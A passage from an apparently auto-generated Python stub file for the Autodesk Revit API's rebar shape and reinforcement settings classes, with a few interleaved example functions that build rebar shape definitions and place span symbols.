AddListeningDimensionSegmentToSegment(self: RebarShapeDefinitionBySegments, paramId: ElementId, constraintDirCoordX: float, constraintDirCoordY: float, iSegment0: int, iSegment1: int) Specify a dimension perpendicular to two fixed-direction segments, measured by a read-only parameter. paramId: Id of a parameter to report the length of the dimension. The parameter will be read-only on Rebar instances. 
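# --- Illustrative usage sketch (not part of the generated stub) --------------
# A two-segment (L-shaped) definition using the constraint methods documented
# above. `bend_angle` stands for a RebarShapeBendAngle value (declared earlier
# in this module); the shared-parameter definitions and default lengths are
# hypothetical.
def _example_l_shape_definition(doc, a_def, b_def, bend_angle):
    a_id = RebarShapeParameters.GetOrCreateElementIdForExternalDefinition(doc, a_def)
    b_id = RebarShapeParameters.GetOrCreateElementIdForExternalDefinition(doc, b_def)
    shape = RebarShapeDefinitionBySegments(doc, 2)
    shape.AddParameter(a_id, 2.0)
    shape.AddParameter(b_id, 3.0)
    # Segment 0 runs along +X, segment 1 along -Y; each is driven by a
    # parallel length constraint measured between the bends.
    shape.SetSegmentFixedDirection(0, 1.0, 0.0)
    shape.AddConstraintParallelToSegment(0, a_id, False, False)
    shape.SetSegmentFixedDirection(1, 0.0, -1.0)
    shape.AddConstraintParallelToSegment(1, b_id, False, False)
    # The single internal vertex (index 1) turns to the right.
    shape.AddBendDefaultRadius(1, RebarShapeVertexTurn.Right, bend_angle)
    return shape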
constraintDirCoordX: The x-coordinate of a 2D vector specifying the constraint direction. constraintDirCoordY: The y-coordinate of a 2D vector specifying the constraint direction. iSegment0: Index of the first segment (0 to NumberOfSegments - 1). iSegment1: Index of the second segment (0 to NumberOfSegments - 1). """ pass def Dispose(self): """ Dispose(self: RebarShapeDefinition, A_0: bool) """ pass def GetSegment(self, segmentIndex): """ GetSegment(self: RebarShapeDefinitionBySegments, segmentIndex: int) -> RebarShapeSegment Return a reference to one of the segments in the definition. segmentIndex: Index of the segment (0 to NumberOfSegments - 1). Returns: The requested segment. """ pass def GetVertex(self, vertexIndex): """ GetVertex(self: RebarShapeDefinitionBySegments, vertexIndex: int) -> RebarShapeVertex Return a reference to one of the vertices in the definition. vertexIndex: Index of the vertex (0 to NumberOfVertices - 1). Returns: The requested vertex. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeDefinition, disposing: bool) """ pass def RemoveParameterFromSegment(self, iSegment, paramId): """ RemoveParameterFromSegment(self: RebarShapeDefinitionBySegments, iSegment: int, paramId: ElementId) Remove constraints from a segment. iSegment: Index of the segment (0 to NumberOfSegments - 1). paramId: Id of a parameter driving one or more constraints. """ pass def SetSegmentAs180DegreeBend(self, iSegment, paramId=None, measureToOutsideOfBend=None): """ SetSegmentAs180DegreeBend(self: RebarShapeDefinitionBySegments, iSegment: int) Indicates that a segment is a "virtual" segment introduced to describe a 180-degree bend. The radius of the bend will be taken from the Bar Type. iSegment: Index of the segment (0 to NumberOfSegments - 1). SetSegmentAs180DegreeBend(self: RebarShapeDefinitionBySegments, iSegment: int, paramId: ElementId, measureToOutsideOfBend: bool) Indicate that a segment is a "virtual" segment introduced to describe a 180-degree bend. The radius of the bend will be driven by radiusParam. iSegment: Index of the segment (0 to NumberOfSegments - 1). paramId: Id of a parameter to drive the radius. To obtain the id of a shared parameter, call RebarShape.GetElementIdForExternalDefinition(). measureToOutsideOfBend: Choose between two possibilities for the references of the radius dimension. If true, measure to the exterior face of the bar. If false, measure to the interior face. """ pass def SetSegmentFixedDirection(self, iSegment, vecCoordX, vecCoordY): """ SetSegmentFixedDirection(self: RebarShapeDefinitionBySegments, iSegment: int, vecCoordX: float, vecCoordY: float) Fix the direction of a segment. iSegment: Index of the segment (0 to NumberOfSegments - 1). vecCoordX: The x-coordinate of a 2D vector specifying the segment direction. vecCoordY: The y-coordinate of a 2D vector specifying the segment direction. """ pass def SetSegmentVariableDirection(self, iSegment): """ SetSegmentVariableDirection(self: RebarShapeDefinitionBySegments, iSegment: int) Remove the fixed direction from a segment. iSegment: Index of the segment (0 to NumberOfSegments - 1). """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) 
initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, doc, numberOfSegments): """ __new__(cls: type, doc: Document, numberOfSegments: int) """ pass MajorSegmentIndex = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Index of a segment that can be considered the most important. Revit attempts to preserve the orientation of this segment when a Rebar instance changes its RebarShape to one with a different number of segments. Get: MajorSegmentIndex(self: RebarShapeDefinitionBySegments) -> int Set: MajorSegmentIndex(self: RebarShapeDefinitionBySegments) = value """ NumberOfSegments = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of straight segments in this shape. Get: NumberOfSegments(self: RebarShapeDefinitionBySegments) -> int """ NumberOfVertices = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The number of vertices in this shape, always equal to NumberOfSegments + 1. Get: NumberOfVertices(self: RebarShapeDefinitionBySegments) -> int """ class RebarShapeMultiplanarDefinition(object, IDisposable): """ A specification for a simple 3D rebar shape. RebarShapeMultiplanarDefinition(outOfPlaneBendDiameter: float) """ def Dispose(self): """ Dispose(self: RebarShapeMultiplanarDefinition) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeMultiplanarDefinition, disposing: bool) """ pass def SetPresenceOfSegments(self, isDuplicateShapePresent, isStartConnectorPresent, isEndConnectorPresent): """ SetPresenceOfSegments(self: RebarShapeMultiplanarDefinition, isDuplicateShapePresent: bool, isStartConnectorPresent: bool, isEndConnectorPresent: bool) Simultaneously set the presence of all 3D segments. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, outOfPlaneBendDiameter): """ __new__(cls: type, outOfPlaneBendDiameter: float) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass DepthParamId = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Id of the parameter driving the multiplanar depth. The depth is measured center-to-center of the bar. A valid shape parameter must be assigned to DepthParamId before the MultiplanarDefinition can be used in RebarShape creation. Get: DepthParamId(self: RebarShapeMultiplanarDefinition) -> ElementId Set: DepthParamId(self: RebarShapeMultiplanarDefinition) = value """ IsDuplicateShapePresent = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether the shape definition includes an offset copy of the 2D shape. 
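# --- Illustrative usage sketch (not part of the generated stub) --------------
# Turning a planar definition into a simple 3D shape. The out-of-plane bend
# diameter value and the depth shared parameter are hypothetical; DepthParamId
# must be assigned before the multiplanar definition can be used.
def _example_multiplanar_definition(doc, depth_def):
    depth_id = RebarShapeParameters.GetOrCreateElementIdForExternalDefinition(doc, depth_def)
    multiplanar = RebarShapeMultiplanarDefinition(0.25)
    multiplanar.DepthParamId = depth_id
    # Keep an offset duplicate of the 2D shape and connect it at the start only.
    multiplanar.SetPresenceOfSegments(True, True, False)
    return multiplanar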
Get: IsDuplicateShapePresent(self: RebarShapeMultiplanarDefinition) -> bool """ IsEndConnectorPresent = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether a perpendicular segment is constructed from the end of the 2D shape. Get: IsEndConnectorPresent(self: RebarShapeMultiplanarDefinition) -> bool """ IsStartConnectorPresent = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Whether a perpendicular segment is constructed from the start of the 2D shape. Get: IsStartConnectorPresent(self: RebarShapeMultiplanarDefinition) -> bool """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeMultiplanarDefinition) -> bool """ OutOfPlaneBendDiameter = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Bend diameter to be applied to the connector segments. Get: OutOfPlaneBendDiameter(self: RebarShapeMultiplanarDefinition) -> float Set: OutOfPlaneBendDiameter(self: RebarShapeMultiplanarDefinition) = value """ class RebarShapeParameters(object, IDisposable): """ Class containing functions that create and retrieve shared parameters for RebarShapes. """ def Dispose(self): """ Dispose(self: RebarShapeParameters) """ pass @staticmethod def GetAllRebarShapeParameters(doc): """ GetAllRebarShapeParameters(doc: Document) -> IList[ElementId] List all shape parameters used by all the existing RebarShapes in the specified document. doc: The document. Returns: ElementIds corresponding to the external parameters. """ pass @staticmethod def GetElementIdForExternalDefinition(doc, externalDefinition): """ GetElementIdForExternalDefinition(doc: Document, externalDefinition: ExternalDefinition) -> ElementId Retrieve the ElementId corresponding to an external rebar shape parameter in the document, if it exists; otherwise, return InvalidElementId. doc: A document. externalDefinition: A shared parameter. Returns: An ElementId representing the shared parameter stored in the document, or InvalidElementId if the parameter is not stored in the document. """ pass @staticmethod def GetExternalDefinitionForElementId(doc, paramId, definitionFile): """ GetExternalDefinitionForElementId(doc: Document, paramId: ElementId, definitionFile: DefinitionFile) -> ExternalDefinition Seach a DefinitionFile for the ExternalDefinition corresponding to a parameter in a document. doc: A document. paramId: The id of a shared parameter in the document. definitionFile: A database of shared parameters. Returns: The external parameter corresponding to the parameter's ElementId, or null if the Id does not correspond to an external parameter, or the parameter is not in the definition file. """ pass @staticmethod def GetOrCreateElementIdForExternalDefinition(doc, externalDefinition): """ GetOrCreateElementIdForExternalDefinition(doc: Document, externalDefinition: ExternalDefinition) -> ElementId Retrieve the ElementId corresponding to an external rebar shape parameter in the document, if it exists; otherwise, add the parameter to the document and generate a new ElementId. doc: A document. externalDefinition: A shared parameter. Returns: An ElementId representing the shared parameter stored in the document. 
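# --- Illustrative usage sketch (not part of the generated stub) --------------
# Resolving shared parameters to ElementIds for use in shape definitions.
# `external_definition` is assumed to come from a DefinitionFile opened by the
# caller.
def _example_resolve_shape_parameter(doc, external_definition):
    # Only Length-type shared parameters may drive RebarShape constraints.
    if not RebarShapeParameters.IsValidExternalDefinition(external_definition):
        return None
    param_id = RebarShapeParameters.GetOrCreateElementIdForExternalDefinition(doc, external_definition)
    # Every shape parameter already used by RebarShapes in this document.
    used_ids = RebarShapeParameters.GetAllRebarShapeParameters(doc)
    return param_id, used_ids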
""" pass @staticmethod def IsValidExternalDefinition(param): """ IsValidExternalDefinition(param: ExternalDefinition) -> bool Checks that an ExternalDefinition (shared parameter) may be used as a Rebar Shape parameter. param: Definition of a shared parameter. Returns: True if the definition is of type Length, false otherwise. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeParameters, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeParameters) -> bool """ class RebarShapeSegment(object, IDisposable): """ Part of a RebarShapeDefinitionBySegments, representing one segment of a shape definition. """ def Dispose(self): """ Dispose(self: RebarShapeSegment) """ pass def GetConstraints(self): """ GetConstraints(self: RebarShapeSegment) -> IList[RebarShapeConstraint] Retrieve the list of constraints associated with this segment. Returns: The list of constraints. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeSegment, disposing: bool) """ pass def SetConstraints(self, constraints): """ SetConstraints(self: RebarShapeSegment, constraints: IList[RebarShapeConstraint]) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeSegment) -> bool """ class RebarShapeSegmentEndReferenceType(Enum, IComparable, IFormattable, IConvertible): """ A choice of two reference points for one end of a constraint driving the length of a RebarShapeSegment. 
enum RebarShapeSegmentEndReferenceType, values: Exterior (1), Straight (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Exterior = None Straight = None value__ = None class RebarShapeVertex(object, IDisposable): """ A bend between segments of a rebar shape definition. """ def Dispose(self): """ Dispose(self: RebarShapeVertex) """ pass def GetConstraints(self): """ GetConstraints(self: RebarShapeVertex) -> IList[RebarShapeConstraint] Retrieve the list of constraints associated with this vertex. Returns: The list of constraints. """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: RebarShapeVertex, disposing: bool) """ pass def SetConstraints(self, constraints): """ SetConstraints(self: RebarShapeVertex, constraints: IList[RebarShapeConstraint]) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass BendAngle = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The range of permissible angles at this bend. Get: BendAngle(self: RebarShapeVertex) -> RebarShapeBendAngle Set: BendAngle(self: RebarShapeVertex) = value """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: RebarShapeVertex) -> bool """ Turn = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The sense of the turn. The Turn property must be set to Left or Right on each internal vertex before the RebarShapeDefinitionBySegments is used. Default is permissible for the first and last vertex, since they do not correspond to bends. Get: Turn(self: RebarShapeVertex) -> RebarShapeVertexTurn Set: Turn(self: RebarShapeVertex) = value """ class RebarShapeVertexTurn(Enum, IComparable, IFormattable, IConvertible): """ Specify whether a bend at a RebarShapeVertex represents a left or right turn. 
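# --- Illustrative usage sketch (not part of the generated stub) --------------
# Each internal vertex of a RebarShapeDefinitionBySegments needs an explicit
# Left/Right turn before the definition is usable. `bend_angle` stands for a
# RebarShapeBendAngle value declared earlier in this module.
def _example_set_vertex_turns(shape, bend_angle):
    for i in range(1, shape.NumberOfVertices - 1):
        vertex = shape.GetVertex(i)
        vertex.Turn = RebarShapeVertexTurn.Left
        vertex.BendAngle = bend_angle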
enum RebarShapeVertexTurn, values: Default (0), Left (1), Right (-1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Default = None Left = None Right = None value__ = None class RebarStyle(Enum, IComparable, IFormattable, IConvertible): """ Describes the usage style of a RebarShape. The style affects the bend radius and the set of allowable hooks. It also affects Rebar instance auto-constraining behavior. enum RebarStyle, values: Standard (0), StirrupTie (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Standard = None StirrupTie = None value__ = None class RebarSystemSpanSymbol(IndependentTag, IDisposable): """ Represents a Rebar System Span Symbol element in Autodesk Revit. """ @staticmethod def Create(document, viewId, hostId, point, symbolId): """ Create(document: Document, viewId: ElementId, hostId: LinkElementId, point: XYZ, symbolId: ElementId) -> RebarSystemSpanSymbol Creates a new instance of RebarSystemSpanSymbol in the project. document: The document. viewId: The id of the view in which the symbol should appear. hostId: The ElementId of AreaReinforcement (either in the document, or linked from another document). point: The span symbol's head position. symbolId: The id of the family symbol of this symbol. Returns: A reference to newly created span symbol. 
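# --- Illustrative usage sketch (not part of the generated stub) --------------
# Placing a span symbol on an AreaReinforcement host. LinkElementId and XYZ come
# from Autodesk.Revit.DB; the view, host element, symbol type id and head point
# are assumed to be provided by the caller, and a Transaction must be open.
def _example_place_span_symbol(doc, view, area_reinforcement, symbol_type_id, head_point):
    host_id = LinkElementId(area_reinforcement.Id)
    return RebarSystemSpanSymbol.Create(doc, view.Id, host_id, head_point, symbol_type_id)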
""" pass def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass class ReinforcementAbbreviationObjectType(Enum, IComparable, IFormattable, IConvertible): """ Defines the type of desired reinforcement object for abbreviation tags. enum ReinforcementAbbreviationObjectType, values: Area (0), Path (1) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Area = None Path = None value__ = None class ReinforcementAbbreviationTag(object, IDisposable): """ This class is used to access the Area or Path Reinforcement abbreviation tag data. It stores abbreviation tag value and abbreviation type. ReinforcementAbbreviationTag(typeTag: ReinforcementAbbreviationTagType, abbreviationTag: str) """ def Dispose(self): """ Dispose(self: ReinforcementAbbreviationTag) """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: ReinforcementAbbreviationTag, disposing: bool) """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) 
initializes x; see x.__class__.__doc__ for signature """ pass @staticmethod # known case of __new__ def __new__(self, typeTag, abbreviationTag): """ __new__(cls: type, typeTag: ReinforcementAbbreviationTagType, abbreviationTag: str) """ pass def __repr__(self, *args): #cannot find CLR method """ __repr__(self: object) -> str """ pass AbbreviationTag = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The abbreviation tag value. Get: AbbreviationTag(self: ReinforcementAbbreviationTag) -> str """ IsValidObject = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: ReinforcementAbbreviationTag) -> bool """ TypeTag = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """The abbreviation tag type. Get: TypeTag(self: ReinforcementAbbreviationTag) -> ReinforcementAbbreviationTagType """ class ReinforcementAbbreviationTagType(Enum, IComparable, IFormattable, IConvertible): """ Defines all types of abbreviation tags for Area and Path Reinforcement objects. enum ReinforcementAbbreviationTagType, values: AreaReinforcementBottomMajor (2), AreaReinforcementBottomMinor (3), AreaReinforcementExteriorMajor (6), AreaReinforcementExteriorMinor (7), AreaReinforcementInteriorMajor (4), AreaReinforcementInteriorMinor (5), AreaReinforcementLayerEachFace (9), AreaReinforcementLayerEachWay (8), AreaReinforcementTopMajor (0), AreaReinforcementTopMinor (1), PathReinforcementAlternating (14), PathReinforcementAlternatingBarOffset (15), PathReinforcementBottom (11), PathReinforcementExterior (13), PathReinforcementInterior (12), PathReinforcementTop (10) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass AreaReinforcementBottomMajor = None AreaReinforcementBottomMinor = None AreaReinforcementExteriorMajor = None AreaReinforcementExteriorMinor = None AreaReinforcementInteriorMajor = None AreaReinforcementInteriorMinor = None AreaReinforcementLayerEachFace = None AreaReinforcementLayerEachWay = None AreaReinforcementTopMajor = None AreaReinforcementTopMinor = None PathReinforcementAlternating = None PathReinforcementAlternatingBarOffset = None PathReinforcementBottom = None PathReinforcementExterior = None PathReinforcementInterior = None PathReinforcementTop = None value__ = None class ReinforcementBarOrientation(Enum, IComparable, IFormattable, IConvertible): """ Describes the bar orientation at Path Reinforcement. 
enum ReinforcementBarOrientation, values: BottomOrInterior (2), FarSide (3), NearSide (1), TopOrExterior (0) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass BottomOrInterior = None FarSide = None NearSide = None TopOrExterior = None value__ = None class ReinforcementRoundingSource(Enum, IComparable, IFormattable, IConvertible): """ An enumerated type listing the possible sources for reinforcement rounding overrides. enum ReinforcementRoundingSource, values: Element (3), None (0), ReinforcementSettings (1), Type (2) """ def __eq__(self, *args): #cannot find CLR method """ x.__eq__(y) <==> x==yx.__eq__(y) <==> x==yx.__eq__(y) <==> x==y """ pass def __format__(self, *args): #cannot find CLR method """ __format__(formattable: IFormattable, format: str) -> str """ pass def __ge__(self, *args): #cannot find CLR method pass def __gt__(self, *args): #cannot find CLR method pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass def __le__(self, *args): #cannot find CLR method pass def __lt__(self, *args): #cannot find CLR method pass def __ne__(self, *args): #cannot find CLR method pass def __reduce_ex__(self, *args): #cannot find CLR method pass def __str__(self, *args): #cannot find CLR method pass Element = None None = None ReinforcementSettings = None Type = None value__ = None class ReinforcementSettings(Element, IDisposable): """ Provides access to project-wide reinforcement settings. """ def Dispose(self): """ Dispose(self: Element, A_0: bool) """ pass def getBoundingBox(self, *args): #cannot find CLR method """ getBoundingBox(self: Element, view: View) -> BoundingBoxXYZ """ pass def GetFabricRoundingManager(self): """ GetFabricRoundingManager(self: ReinforcementSettings) -> FabricRoundingManager Returns an object for managing reinforcement rounding override settings used by FabricSheetType and FabricSheet elements. Returns: The rounding manager. """ pass def GetRebarRoundingManager(self): """ GetRebarRoundingManager(self: ReinforcementSettings) -> RebarRoundingManager Returns an object for managing reinforcement rounding override settings used by RebarBarTypes, Rebar and RebarInSystem elements. Returns: The rounding manager. """ pass def GetReinforcementAbbreviationTag(self, tagType): """ GetReinforcementAbbreviationTag(self: ReinforcementSettings, tagType: ReinforcementAbbreviationTagType) -> str Gets one abbreviation tag for desired ReinforcementAbbreviationTagType. tagType: Defines the type of abbreviation tag. 
Returns: Abbreviation tag value """ pass def GetReinforcementAbbreviationTags(self, objectType): """ GetReinforcementAbbreviationTags(self: ReinforcementSettings, objectType: ReinforcementAbbreviationObjectType) -> IList[ReinforcementAbbreviationTag] Gets a list of abbreviation tags for desired reinforcement object type. objectType: Defines the type of desired reinforcement object for abbreviation tags. Returns: An array of ReinforcementAbbreviationTag that will define all abbreviations for given reinforcement object. """ pass @staticmethod def GetReinforcementSettings(cda): """ GetReinforcementSettings(cda: Document) -> ReinforcementSettings Obtains the ReinforcementSettings object for the specified project document. cda: A project document. Returns: The ReinforcementSettings object. """ pass def IsEqual(self, other): """ IsEqual(self: ReinforcementSettings, other: ReinforcementSettings) -> bool Checks if Reinforcement Settings is equal to other """ pass def ReleaseUnmanagedResources(self, *args): #cannot find CLR method """ ReleaseUnmanagedResources(self: Element, disposing: bool) """ pass def setElementType(self, *args): #cannot find CLR method """ setElementType(self: Element, type: ElementType, incompatibleExceptionMessage: str) """ pass def SetReinforcementAbbreviationTag(self, tagType, abbreviationTag): """ SetReinforcementAbbreviationTag(self: ReinforcementSettings, tagType: ReinforcementAbbreviationTagType, abbreviationTag: str) Sets one abbreviation tag for desired ReinforcementAbbreviationTagType. tagType: Defines the type of abbreviation tag. abbreviationTag: Abbreviation tag value to set. """ pass def __enter__(self, *args): #cannot find CLR method """ __enter__(self: IDisposable) -> object """ pass def __exit__(self, *args): #cannot find CLR method """ __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """ pass def __init__(self, *args): #cannot find CLR method """ x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """ pass HostStructuralRebar = property(lambda self: object(), lambda self, v: None, lambda self: None) # default """Host Structural Rebar within Area and Path Reinforcement with touching AtomHostStructuralRebar. Get: HostStructuralRebar(self: ReinforcementSettings) -> bool Set: HostStructuralRebar(self: ReinforcementSettings) = value """ NumberVaryingLengthRebarsIndividually = property(lambda self: object(), 